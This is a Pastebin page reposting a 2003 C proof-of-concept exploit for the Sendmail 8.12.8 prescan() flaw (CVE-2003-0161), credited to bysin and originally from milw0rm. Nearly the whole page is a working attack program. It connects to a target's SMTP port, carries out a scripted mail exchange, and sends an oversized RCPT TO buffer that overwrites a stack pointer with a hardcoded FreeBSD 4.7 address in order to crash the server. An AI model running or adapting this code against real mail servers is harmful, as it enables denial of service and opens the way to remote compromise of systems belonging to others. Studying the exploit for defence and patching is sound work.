Advertisement
FlyFar

Sendmail 8.12.8 (BSD) - 'Prescan()' Remote Command Execution - CVE-2003-0161

Jan 24th, 2024
747
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 4.00 KB | Cybersecurity | 0 0
  1. /*
  2.  * Sendmail 8.12.8 prescan() PROOF OF CONCEPT exploit by bysin
  3.  *
  4.  * This is to prove that the bug in sendmail 8.12.8 and below is vulnerable.
  5.  * On sucessful POC exploitation the program should crash with the following:
  6.  *
  7.  * Program received signal SIGSEGV, Segmentation fault.
  8.  * 0x5c5c5c5c in ?? ()
  9.  *
  10.  */
  11.  
  12. #include <sys/types.h>
  13. #include <sys/socket.h>
  14. #include <sys/time.h>
  15. #include <netinet/in.h>
  16. #include <unistd.h>
  17. #include <netdb.h>
  18. #include <stdio.h>
  19. #include <fcntl.h>
  20. #include <errno.h>
  21.  
  22. int maxarch=1;
  23. struct arch {
  24.     char *os; // The OS
  25.     int pos; // The position of ebp in the stack, with the last byte being 0x00
  26.     int apos; // The amount of bytes after pvpbuf where ebp is located
  27.     unsigned long addr; // The pointer to the addr buffer
  28. } archs[] = {
  29.     {"FreeBSD 4.7-RELEASE",180,28,0xbfbfdad1},
  30. };
  31.  
  32.  
  33. /////////////////////////////////////////////////////////
  34.  
  35. #define BUFSIZE 50096
  36.  
  37. void header() {
  38.     printf("Sendmail 8.12.8 prescan() exploit by bysin\n\n");
  39. }
  40.  
  41. void printtargets() {
  42.     unsigned long i;
  43.     header();
  44.     printf("\t  Target\t Addr\t\t OS\n");
  45.     printf("\t-------------------------------------------\n");
  46.     for (i=0;i<maxarch;i++) printf("\t* %d\t\t 0x%08x\t %s\n",i,archs[i].addr,archs[i].os);
  47.     printf("\n");
  48. }
  49.  
  50. void printresponse(char *a) {
  51.     printf("%s\n",a);
  52. }
  53.  
  54. void writesocket(int sock, char *buf) {
  55.     if (send(sock,buf,strlen(buf),0) <= 0) {
  56.         printf("Error writing to socket\n");
  57.         exit(0);
  58.     }
  59.     printresponse(buf);
  60. }
  61.  
  62. void readsocket(int sock, int response) {
  63.     char temp[BUFSIZE];
  64.     memset(temp,0,sizeof(temp));
  65.     if (recv(sock,temp,sizeof(temp),0) <= 0) {
  66.         printf("Error reading from socket\n");
  67.         exit(0);
  68.     }
  69.     if (response != atol(temp)) {
  70.         printf("Bad response: %s\n",temp);
  71.         exit(0);
  72.     }
  73.     else printresponse(temp);
  74. }
  75.  
  76. void relay(int sock) {
  77.     while(1) {
  78.         char temp[BUFSIZE];
  79.         memset(temp,0,sizeof(temp));
  80.         if (recv(sock,temp,sizeof(temp),0) <= 0) {
  81.             printf("Server vulnerable (crashed)\n");
  82.             exit(0);
  83.         }
  84.         printresponse(temp);
  85.         if (atol(temp) == 553) {
  86.             printf("Not exploitable\n");
  87.             exit(0);
  88.         }
  89.     }
  90. }
  91.  
  92. int main(int argc, char **argv) {
  93.     struct sockaddr_in server;
  94.     unsigned long ipaddr,i,j,m;
  95.     int sock,target;
  96.     char tmp[BUFSIZE],buf[BUFSIZE],*p,*pos=NULL;
  97.     if (argc <= 2) {
  98.         printf("%s <target ip> <target number>\n",argv[0]);
  99.         printtargets();
  100.         return 0;
  101.     }
  102.     target=atol(argv[2]);
  103.     if (target < 0 || target >= maxarch) {
  104.         printtargets();
  105.         return 0;
  106.     }
  107.  
  108.     header();
  109.  
  110.     if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
  111.         printf("Unable to create socket\n");
  112.         exit(0);
  113.     }
  114.     server.sin_family = AF_INET;
  115.     server.sin_port = htons(25);
  116.     printf("Resolving address... ");
  117.     fflush(stdout);
  118.     if ((ipaddr = inet_addr(argv[1])) == -1) {
  119.         struct hostent *hostm;
  120.         if ((hostm=gethostbyname(argv[1])) == NULL) {
  121.             printf("Unable to resolve address\n");
  122.             exit(0);
  123.         }
  124.         memcpy((char*)&server.sin_addr, hostm->h_addr, hostm->h_length);
  125.     }
  126.     else server.sin_addr.s_addr = ipaddr;
  127.     memset(&(server.sin_zero), 0, 8);
  128.     printf("Address found\n");
  129.     printf("Connecting... ");
  130.     fflush(stdout);
  131.     if (connect(sock,(struct sockaddr *)&server, sizeof(server)) != 0) {
  132.         printf("Unable to connect\n");
  133.         exit(0);
  134.     }
  135.     printf("Connected\n");
  136.     printf("Sending exploit... \n");
  137.     fflush(stdout);
  138.  
  139.     readsocket(sock,220);
  140.  
  141.     writesocket(sock,"HELO yahoo.com\r\n");
  142.     readsocket(sock,250);
  143.  
  144.     writesocket(sock,"MAIL FROM: <a@yahoo.com>\r\n");
  145.     readsocket(sock,250);
  146.  
  147.     memset(buf,0,sizeof(buf));
  148.     strcpy(buf,"RCPT TO: ");
  149.     p=buf+strlen(buf);
  150.     for (i=1,j=0,m=0;i<1242;i++) {
  151.         if (!(i%256)) {
  152.             *p++=';';
  153.             j++;
  154.         }
  155.         else {
  156.             if (j < 4) *p++='A';
  157.             else {
  158.                 if (m == archs[target].pos) pos=p;
  159.                 //if (m > archs[target].pos) *p++='B'; else
  160.                 *p++='A';
  161.                 m++;
  162.             }
  163.         }
  164.     }
  165.     if (pos) memcpy(pos,(char*)&archs[target].addr,4);
  166.     *p++=';';
  167.     for (i=0;i<archs[target].apos;i++) {
  168.         *p++='\\';
  169.         *p++=0xff;
  170.     }
  171.     strcat(buf,"\r\n");
  172.     writesocket(sock,buf);
  173.  
  174.     relay(sock);
  175. }
  176.  
  177.  
  178. // milw0rm.com [2003-04-30]
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement